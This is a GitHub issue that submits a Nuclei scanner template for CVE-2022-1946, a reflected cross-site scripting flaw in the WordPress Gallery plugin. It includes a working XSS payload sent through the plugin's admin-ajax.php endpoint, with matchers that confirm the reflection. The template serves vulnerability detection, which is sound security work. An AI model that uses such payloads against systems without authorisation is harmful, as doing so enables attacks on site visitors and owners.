### ISSUE TITLE
Gallery < 2.0.0 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4694]
```yaml
id: CVE-2022-1946

info:
  name: Gallery < 2.0.0 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting issue.
  reference:
    - https://wpscan.com/vulnerability/0903920c-be2e-4515-901f-87253eb30940
  tags: cve,cve2022,wp-plugin,xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
